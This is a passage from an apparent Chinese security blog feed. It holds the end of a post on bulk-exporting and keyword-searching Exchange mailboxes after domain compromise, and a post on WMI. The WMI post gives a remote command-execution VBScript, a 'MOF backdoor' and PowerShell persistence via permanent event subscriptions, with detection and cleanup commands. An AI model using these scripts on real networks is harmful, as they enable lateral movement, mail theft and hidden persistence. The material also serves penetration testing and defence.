ruos.org/Users/a Completed</div></pre></td></tr></table></figure></p><h4 id="删除全部或部分完成的导出请求"><a href="#删除全部或部分完成的导出请求" class="headerlink" title="删除全部或部分完成的导出请求"></a>删除全部或部分完成的导出请求</h4><p><code>[PS] C:\Windows\system32>Remove-MailboxExportRequest -Identity "a\MailboxExport"</code></p><p>删除所有状态为“已完成”的导出请求</p><p><code>Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false</code></p><p>或者通过ECP导出,缺点是不能过滤时间,并且管理员会收到导出完成通知。</p><p><img src="http://i.imgur.com/L24RI8O.jpg" alt=""></p><p>以上介绍了如何通过EMS导出用户邮件,但是谁也不能保证你不会和管理员撞个满怀。值得庆幸的是,Exchange Server支持PowerShell远程操作。</p><h2 id="Exchange-PowerShell"><a href="#Exchange-PowerShell" class="headerlink" title="Exchange PowerShell"></a>Exchange PowerShell</h2><p>远程 PowerShell 提供了从命令行管理 Exchange Online的方式,利人又利己。</p><h4 id="创建用户凭证"><a href="#创建用户凭证" class="headerlink" title="创建用户凭证"></a>创建用户凭证</h4><p><code>$Credential = Get-Credential</code></p><p>但这样会弹出凭据请求输入框,使用 PSCredential 创建非交互式登陆凭据。</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$pass</span> = <span class="built_in">ConvertTo-SecureString</span> <span class="string">"PlainTextPassword"</span> -AsPlainText -Force</div><div class="line"><span class="variable">$Credential</span> = <span class="built_in">New-Object</span> System.Management.Automation.PSCredential (<span class="string">"Domain01\User01"</span>, <span class="variable">$pass</span>)</div></pre></td></tr></table></figure><h4 id="创建登陆会话"><a href="#创建登陆会话" class="headerlink" title="创建登陆会话"></a>创建登陆会话</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$Session</span> = <span class="built_in">New-PSSession</span> -ConfigurationName Microsoft.Exchange `</div><div class="line">-ConnectionUri http://<FQDN of Exchange <span class="number">2016</span> Mailbox server>/PowerShell/ `</div><div class="line">-Authentication Kerberos -Credential <span class="variable">$Credential</span></div></pre></td></tr></table></figure><h4 id="导入会话"><a href="#导入会话" class="headerlink" title="导入会话"></a>导入会话</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Import-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure><h4 id="移除会话"><a href="#移除会话" class="headerlink" title="移除会话"></a>移除会话</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Remove-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure><h2 id="Scripting-with-the-Exchange-Management-Shell"><a href="#Scripting-with-the-Exchange-Management-Shell" class="headerlink" title="Scripting with the Exchange Management Shell"></a>Scripting with the Exchange Management Shell</h2><p>通过SHELL的方式执行脚本。<br>适用于: Exchange Server 2013</p><p>exchange默认根目录在 <root drive="">:\Program Files\Microsoft\Exchange Server\V15\bin</root></p><h4 id="执行自定义脚本"><a href="#执行自定义脚本" class="headerlink" title="执行自定义脚本"></a>执行自定义脚本</h4><p>需要开启远程脚本执行权限</p><p><code>Set-ExecutionPolicy RemoteSigned</code></p><p>Script</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># filename:test.ps1</span></div><div class="line"><span class="comment"># export to pst</span></div><div class="line"><span class="keyword">foreach</span>(<span class="variable">$user</span> <span class="keyword">in</span> <span class="string">"admin"</span>,<span class="string">"user1"</span>,<span class="string">"user2"</span>){</div><div class="line"> New-MailboxExportRequest -Mailbox <span class="variable">$user</span> -ContentFilter { Received <span class="nomarkup">-gt</span> <span class="string">"11/29/2016"</span> } -FilePath <span class="string">"\\192.168.6.2\sharename<span class="variable">$\$</span>user.pst"</span></div><div class="line"> <span class="built_in">Start-Sleep</span> -Seconds <span class="number">3</span></div><div class="line">}</div></pre></td></tr></table></figure><p>从cmd启动脚本</p><blockquote><p>64位系统下存在文件系统重定向机制,powershell路径为 C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe</p></blockquote><p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; C:\test.ps1"</code></p><p>or </p><p>查看角色权限</p><p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; Get-ManagementRoleAssignment -role \"Mailbox Import Export\""</code></p><h2 id="邮件搜索-Search-Mailbox"><a href="#邮件搜索-Search-Mailbox" class="headerlink" title="邮件搜索 Search-Mailbox"></a>邮件搜索 Search-Mailbox</h2><p>Step 1: 将用户加入Organization Manageme组,并为指派角色</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">net group "Organization Manageme" admin /add /domain</div><div class="line">[PS] C:\>New-ManagementRoleAssignment -Role "Mailbox Import Export" -User admin</div><div class="line"># 添加到组 Discovery Management</div><div class="line">[PS] C:\>Add-RoleGroupMember -Identity "Discovery Management" -Member admin</div></pre></td></tr></table></figure><p>Step 2: 创建发现搜索邮箱<br><code>New-Mailbox -Name SearchResults -Discovery</code></p><p>设置发现邮箱在地址列表中可见<br><code>Set-Mailbox -Id SearchResults -HiddenFromAddressListsEnabled $false</code></p><p>查看发现搜索邮箱<br><code>Get-Mailbox -Resultsize unlimited -Filter {RecipientTypeDetails -eq "DiscoveryMailbox"}</code></p><p>Step 3: 指定admin用户对搜索邮箱的完全访问<br><code>Add-MailboxPermission SearchResults -User admin -AccessRights FullAccess -InheritanceType all</code></p><p>Step 4: 搜索邮件</p><p>搜索包含key1或key2关键字,在18年5月4号之后的并且不包含发件人hr的邮件。</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 查看结果</span></div><div class="line">[PS] C:\>Search-Mailbox -Identity <span class="string">"test"</span> -SearchQuery <span class="string">'(key1 OR key2) AND Received>05/04/2018 NOT From:hr@ruos.org'</span> -EstimateResultOnly</div><div class="line"></div><div class="line">[PS] C:\>Get-Mailbox -ResultSize Unlimited |</div><div class="line">Search-Mailbox -SearchQuery <span class="string">'(key1 OR key2) AND Received:05/01/2018..05/08/2018'</span> `</div><div class="line">-DoNotIncludeArchive `</div><div class="line">-TargetMailbox <span class="string">"SearchResults"</span> `</div><div class="line">-TargetFolder <span class="string">"Results"</span> `</div><div class="line">-LogLevel Suppress</div></pre></td></tr></table></figure><p>在test邮箱中打开搜索邮箱</p><p><img src="https://i.imgur.com/fv4mOuF.png" alt=""></p><h2 id="结束语"><a href="#结束语" class="headerlink" title="结束语"></a>结束语</h2><p>Exchange和AD的紧密性使得很多Cmdlet Reference都能达到同样的目的,比如查询用户登陆的源IP地址,我们还能通过Exchange的IIS日志来查找。但有时候遗憾的是,用户虽然在使用邮箱,工作机却没有加入域中。这种情况我们就需要配合其他信息进一步确认。</p><p><img src="http://i.imgur.com/f0rIlU4.png" alt=""></p><p>参考资料</p><p><a href="https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx</a><br><a href="https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx</a><br><a href="https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx" target="_blank" rel="external">https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx</a><br>Microsoft Exchange Server 2013 PowerShell Cookbook</p><p><a href="http://blog.51cto.com/msftuc/1660885" target="_blank" rel="external">http://blog.51cto.com/msftuc/1660885</a></p>]]></content>
<summary type="html">
<p><img src="https://i-technet.sec.s-msft.com/Areas/Epx/Themes/TechNet/Content/Images/BrandLogoExchange.png?v=636437933426396895" alt=""></p>
<blockquote>
<p>Microsoft Exchange Server 做为消息与协作系统。它提供了业界最强的扩展性、高可靠性、安全性和高处理性能,被许多企业、学校、政府等作为主要邮件系统。在内网渗透测试中,对邮件系统的把控会让你事半功倍,尤其是和AD绑在一起的Exchange。</p>
</blockquote>
<p>通过本文你将了解Ps下对Exchange邮件的基本操作,这也同样适用于运维管理,当然相比博大精深的ES是远远不够的。以下环境为Exchange server 2013,也同样适用于2010等版本。</p>
<p>你可以在开始菜单中通过 Exchange Management Shell (EMS)管理器快捷方式连接到 exchange server,初始化过后你将得到一个Powershell命令窗口。如果连接失败,请相信我,一定是你内存分配的不够,默认安装的Exchange也至少需要分配6个G内存。</p>
<p>如果一切都没有问题,并且你已经获取了域控权限,那就开始我们的旅程吧!</p>
</summary>
</entry>
<entry>
<title>WMI</title>
<link href="http://ruos.org/2017/02/08/WMI/"/>
<id>http://ruos.org/2017/02/08/WMI/</id>
<published>2017-02-08T04:36:12.000Z</published>
<updated>2017-11-06T02:07:10.798Z</updated>
<content type="html"><![CDATA[<h3 id="WMI-管理规范"><a href="#WMI-管理规范" class="headerlink" title="WMI 管理规范"></a>WMI 管理规范</h3><p>术语</p><ul><li>CIM - Common Information Model – this is the premier concept of WBEM by this model WMI stores the Managed objects data (namespace, classes, methods, properties etc.). </li><li>CIM Repository – This is the storage that holds the Managed objects data. The structure of the CIM repository is build upon the DMTF. </li><li>CIMOM - Common Information Model object manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks available classes and determines which provider is responsible for supplying instances of these classes.. </li><li>DMTF - Distributed Management Task Force – The DMTF consortium was founded in May of 1992. This initiative was conceived and created by eight companies like: BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp., and Microsoft Corp. etc. The aims of this consortium are to define industry standards for management.</li><li>MIB – Management Information Base describes a set of managed objects. Each managed object in a MIB has a unique identifier.</li><li>MOF - Managed Object Format. This text file includes the class definition of on or more managed object. You can export and import this definition from the CIM repository by using the WMI CIM Studio.</li><li>Schema - a group of classes that describe a particular management environment.</li><li>SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is a part of TCP/IP suite of protocols. SNMP is the protocol by which managed information is travel between stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).</li><li>WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment. </li></ul><p>协议</p><p>DCOM TCP Port 135<br>WinRM TCP Ports 5985 (HTTP) and 5986 (HTTPS).<br>服务 Winmgmt </p><a id="more"></a><h3 id="测试工具"><a href="#测试工具" class="headerlink" title="测试工具"></a>测试工具</h3><ul><li>wmic.exe</li><li>wbemtest.exe</li><li>winrm.exe</li><li>CIM Studio</li><li>Powershell</li></ul><p>WMIC</p><p>列出进程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process list brief</div></pre></td></tr></table></figure></p><p>创建进程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">wmic process call create "notepad.exe"</div><div class="line">wmic /node:"hostname" /user:"domain\administrator" /password:"123456" process get name,processid</div></pre></td></tr></table></figure></p><p>结束程序<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process where name="qq.exe" call terminate</div></pre></td></tr></table></figure></p><p>启动服务<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic SERVICE where name="tlntsvr" call startservice</div></pre></td></tr></table></figure></p><p>计划任务<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic job</div></pre></td></tr></table></figure></p><p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\SecurityCenter2 -Class AntiVirusProduct</div></pre></td></tr></table></figure></p><p>//-Cre 为创建好的登陆凭据<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Invoke-WmiMethod</span> -Class Win32_Process -Name Create -ArgumentList <span class="string">'notepad.exe'</span> -ComputerName <span class="number">192.168</span>.<span class="number">6.2</span> -Credential domain\administrator</div></pre></td></tr></table></figure></p><p>WQL<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_ComputerSystem <span class="keyword">WHERE</span> NumberOfLogicalProcessors < <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> __InstanceCreationEvent <span class="keyword">WITHIN</span> <span class="number">15</span> <span class="keyword">WHERE</span> TargetInstance ISA <span class="string">'Win32_LogonSession'</span> <span class="keyword">AND</span> TargetInstance.LogonType = <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_VolumeChangeEvent <span class="keyword">WHERE</span> EventType = <span class="number">2</span></div></pre></td></tr></table></figure></p><h3 id="WSH"><a href="#WSH" class="headerlink" title="WSH"></a>WSH</h3><p>REMOTE COMMAND EXEC</p><blockquote><p>有时候低权限用户无法初始化wmic命令行程序,但vbs却能访问wmi接口。</p></blockquote><figure class="highlight vbs"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line"><span class="comment">'VBS</span></div><div class="line"><span class="comment">' remote command exec</span></div><div class="line"><span class="comment">' cscript wmiexec.vbs 192.168.6.2 domain\administrator 123456 "cmd.exe /c net user > c:\11.txt"</span></div><div class="line"><span class="keyword">On</span> <span class="keyword">Error</span> <span class="keyword">GoTo</span> <span class="number">0</span></div><div class="line"><span class="keyword">Dim</span> strComputer</div><div class="line"><span class="keyword">Dim</span> strUser</div><div class="line"><span class="keyword">Dim</span> strPassword</div><div class="line"><span class="keyword">Dim</span> strCommand</div><div class="line"><span class="keyword">Set</span> objArgs = WScript.Arguments</div><div class="line">strComputer = objArgs(<span class="number">0</span>)</div><div class="line">strUser = objArgs(<span class="number">1</span>)</div><div class="line">strPassword = objArgs(<span class="number">2</span>)</div><div class="line">strCommand = objArgs(<span class="number">3</span>)</div><div class="line"><span class="keyword">Set</span> objWMIService = <span class="built_in">CreateObject</span>(<span class="string">"WbemScripting.SWbemLocator"</span>).ConnectServer(strComputer,<span class="string">"root/cimv2"</span>,strUser,strPassword)</div><div class="line"><span class="comment">' Create process</span></div><div class="line"><span class="keyword">Set</span> process = objWMIService.<span class="keyword">Get</span>(<span class="string">"Win32_Process"</span>)</div><div class="line">intReturn = process.Create(strCommand)</div><div class="line"><span class="keyword">If</span> intReturn <><span class="number">0</span> <span class="keyword">then</span></div><div class="line">WScript.Echo <span class="string">"Return value: "</span> & intReturn</div><div class="line">WScript.Echo <span class="string">"Access denied (2)"</span> &vbLf & _</div><div class="line"><span class="string">"Insufficient privilege (3)"</span> &vbLf & _</div><div class="line"><span class="string">"Unknown failure (8)"</span> &vbLf & _</div><div class="line"><span class="string">"Path not found (9)"</span> &vbLf & _</div><div class="line"><span class="string">"Invalid parameter (21)"</span> &vbLf & _</div><div class="line"><span class="string">"Other (22-4294967295)"</span></div><div class="line"><span class="keyword">Else</span></div><div class="line">Wscript.Echo <span class="string">"Process created."</span></div><div class="line"><span class="keyword">End</span> <span class="keyword">If</span></div></pre></td></tr></table></figure><h3 id="MOF-后门"><a href="#MOF-后门" class="headerlink" title="MOF 后门"></a>MOF 后门</h3><blockquote><p>Managed Object Format (MOF)是WMI数据库中类和类实例的原始保存形式</p></blockquote><p>动态创建 WMI 类</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$StaticClass</span>=New-ObjectManagement.ManagementClass(<span class="string">'root\cimv2'</span>,<span class="literal">$null</span>,<span class="literal">$null</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Name = <span class="string">'Win32_EvilClass'</span></div><div class="line"><span class="variable">$StaticClass</span>.Put()</div><div class="line"><span class="variable">$StaticClass</span>.Properties.Add(<span class="string">'EvilProperty'</span>,<span class="string">"This is not the malware you're looking for"</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Put()</div></pre></td></tr></table></figure><p>创建永久事件订阅</p><ol><li>Event Filters 事件筛选器 -筛选出感兴趣的事件 </li><li><p>Event Consumers 事件消费者 -要在事件被触发时执行的操作 </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"> __EventConsumer </div><div class="line">LogFileEventConsumer - 将事件数据写入到指定的日志文件 </div><div class="line">ActiveScriptEventConsumer - 执行嵌入的 VBScript 或 JScript 脚本 </div><div class="line">payloadNTEventLogEventConsumer - 创建一个包含事件数据的事件日志条目 </div><div class="line">SMTPEventConsumer - 发送一封包含事件数据的电子邮件 </div><div class="line">CommandLineEventConsumer - 执行一个命令行程序</div></pre></td></tr></table></figure></li><li><p>Binding -绑定筛选器到消费者<br> __FilterToConsumerBinding</p></li></ol><p>事件类型 </p><p>内部事件<br>内部事件表示的是创建、修改和删除任何 WMI 类,对象或命名空间的事件。常以两个下划线开头。有可能错过事件,所以必须在 WQL 查询语句的 WITHIN 子句中指定事件轮询间隔。<br>__InstanceCreationEvent </p><p>外部事件<br>WMI外部事件较少,事件发生时立刻被触发。<br>ROOT\CIMV2:Win32_OperatingSystem </p><blockquote><p>使用外部的 Win32_ProcessStartTrace 事件作为创建 LogonUI.exe 的触发器,可在用户登录的时候执行特定脚本或程序。</p></blockquote><p>test.mof</p><p><a href="https://www.codeproject.com/articles/27914/wmi-mof-basics" target="_blank" rel="external">https://www.codeproject.com/articles/27914/wmi-mof-basics</a></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")</div><div class="line"></div><div class="line">instance of CommandLineEventConsumer as $Consumer</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_CL";</div><div class="line"> RunInteractively=false;</div><div class="line"> CommandLineTemplate="calc.exe";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __EventFilter as $EventFilter</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_EF";</div><div class="line"> EventNamespace = "Root\\Cimv2";</div><div class="line"> Query ="SELECT * FROM __InstanceCreationEvent Within 5 Where TargetInstance Isa \"Win32_Process\" And Targetinstance.Name = \"notepad.exe\" ";</div><div class="line"> QueryLanguage = "WQL";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __FilterToConsumerBinding {</div><div class="line"> Filter = $EventFilter;</div><div class="line"> Consumer = $Consumer;</div><div class="line">};</div></pre></td></tr></table></figure><p>编译<br>mofcomp.exe –autorecover test.mof </p><p>mofcomp -N //[machinename]/root/subscription test.mof</p><p>或者<br>拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹,会自动编译执行</p><p>PowerShell</p><p>• Get-WmiObject<br>• Get-CimAssociatedInstance<br>• Get-CimClass - Powershell 3.0 CmdLet<br>• Get-CimInstance<br>• Get-CimSession<br>• Set-WmiInstance<br>• Set-CimInstance<br>• Invoke-WmiMethod<br>• Invoke-CimMethod<br>• New-CimInstance<br>• New-CimSession<br>• New-CimSessionOption<br>• Register-CimIndicationEvent<br>• Register-WmiEvent<br>• Remove-CimInstance<br>• Remove-WmiObject<br>• Remove-CimSession </p><p>创建开机启动事件</p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$filterName</span>=<span class="string">'BotFilter82'</span></div><div class="line"><span class="variable">$consumerName</span>=<span class="string">'BotConsumer23'</span></div><div class="line"><span class="variable">$exePath</span>=<span class="string">'C:\MyProg.exe'</span></div><div class="line"><span class="comment">#创建一个__EventFilter</span></div><div class="line"><span class="variable">$Query</span>=<span class="string">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"</span></div><div class="line"><span class="variable">$WMIEventFilter</span>=<span class="built_in">Set-WmiInstance</span> -Class __EventFilter -NameSpace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$filterName</span>;</div><div class="line">EventNameSpace=<span class="string">"root\cimv2"</span>;</div><div class="line">QueryLanguage=<span class="string">"WQL"</span>;</div><div class="line">Query=<span class="variable">$Query</span>} -ErrorAction Stop</div><div class="line"><span class="comment">#创建一个CommandLineEventConsumer</span></div><div class="line"><span class="variable">$WMIEventConsumer</span>=<span class="built_in">Set-WmiInstance</span> -Class CommandLineEventConsumer -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$consumerName</span>;</div><div class="line">ExecutablePath=<span class="variable">$exePath</span>;</div><div class="line">CommandLineTemplate=<span class="variable">$exePath</span>}</div><div class="line"><span class="comment">#用于绑定filter和consumer</span></div><div class="line"><span class="built_in">Set-WmiInstance</span> -Class __FilterToConsumerBinding -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line"><span class="keyword">Filter</span>=<span class="variable">$WMIEventFilter</span>;</div><div class="line">Consumer=<span class="variable">$WMIEventConsumer</span></div><div class="line">}</div></pre></td></tr></table></figure><h3 id="检测"><a href="#检测" class="headerlink" title="检测"></a>检测</h3><blockquote><p>wmi有时候被恶意软件用来修改浏览器主页</p></blockquote><p>查看过滤器,消费者,绑定</p><p>PowerShell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#List Event Filters</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter</div><div class="line"><span class="comment">#List Event Consumers</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="comment">#List Event Bindings</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding</div></pre></td></tr></table></figure></p><p>使用 wmic</p><p>wmic /namespace:\root\subscription PATH <strong>EventConsumer get/format:list<br>wmic /namespace:\root\subscription PATH </strong>EventFilter get/format:list<br>wmic /namespace:\root\subscription PATH <strong>FilterToConsumerBinding get/ format:list<br>wmic /namespace:\root\subscription PATH </strong>TimerInstruction get/format:list</p><p>清除</p><p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter -Filter <span class="string">"Name='filtP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class CommandLineEventConsumer -Filter <span class="string">"Name='consP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter <span class="string">"__Path LIKE '%BotFilter82%'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose</div></pre></td></tr></table></figure></p><p>使用 wmic</p><p>wmic /namespace:\root\subscription PATH <strong>EventConsumer delete<br>wmic /namespace:\root\subscription PATH </strong>EventFilter delete<br>wmic /namespace:\root\subscription PATH <strong>FilterToConsumerBinding delete<br>wmic /namespace:\root\subscription PATH </strong>TimerInstruction delete</p><h3 id="WMI-Providers"><a href="#WMI-Providers" class="headerlink" title="WMI Providers"></a>WMI Providers</h3><p><a href="https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers" target="_blank" rel="external">https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers</a></p><p>安装提供程序<br>Installutil.exe WMIServiceHost.dll</p><p>wmic PATH win32_servicehost</p><p>错误处理 </p><p>注册dll<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">regasm %systemdrive%\program files\reference assemblies\microsoft\framework\v3.5\system.management.instrumentation.dll</div></pre></td></tr></table></figure></p><h3 id="架构"><a href="#架构" class="headerlink" title="架构"></a>架构</h3><p>namespaces, classes, and objects</p><p>持久性对象存储在位于 %SystemRoot%\System32\wbem\Repository\ 的 CIM 数据库中,它存储着 WMI 类的实例,类的定义和命名空间的定义。</p><blockquote><p>Note<br>1,CIM 数据库可存储任意数据<br>2,作为C2通道传输数据<br>3,创建提供程序 </p></blockquote>]]></content>
<summary type="html">
<h3 id="WMI-管理规范"><a href="#WMI-管理规范" class="headerlink" title="WMI 管理规范"></a>WMI 管理规范</h3><p>术语</p>
<ul>
<li>CIM - Common Information Model – this is the premier concept of WBEM by this model WMI stores the Managed objects data (namespace, classes, methods, properties etc.). </li>
<li>CIM Repository – This is the storage that holds the Managed objects data. The structure of the CIM repository is build upon the DMTF. </li>
<li>CIMOM - Common Information Model object manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks available classes and determines which provider is responsible for supplying instances of these classes.. </li>
<li>DMTF - Distributed Management Task Force – The DMTF consortium was founded in May of 1992. This initiative was conceived and created by eight companies like: BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp., and Microsoft Corp. etc. The aims of this consortium are to define industry standards for management.</li>
<li>MIB – Management Information Base describes a set of managed objects. Each managed object in a MIB has a unique identifier.</li>
<li>MOF - Managed Object Format. This text file includes the class definition of on or more managed object. You can export and import this definition from the CIM repository by using the WMI CIM Studio.</li>
<li>Schema - a group of classes that describe a particular management environment.</li>
<li>SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is a part of TCP/IP suite of protocols. SNMP is the protocol by which managed information is travel between stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).</li>
<li>WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment. </li>
</ul>
<p>协议</p>
<p>DCOM TCP Port 135<br>WinRM TCP Ports 5985 (HTTP) and 5986 (HTTPS).<br>服务 Winmgmt </p>
</summary>
</entry>
<entry>
<title>Iptables</title>
<link href="http://ruos.org/2016/09/19/Iptables/"/>
<id>http://ruos.org/2016/09/19/Iptables/</id>
<published>2016-09-19T08:55:06.000Z</published>
<updated>2018-02-27T08:14:50.020Z</updated>
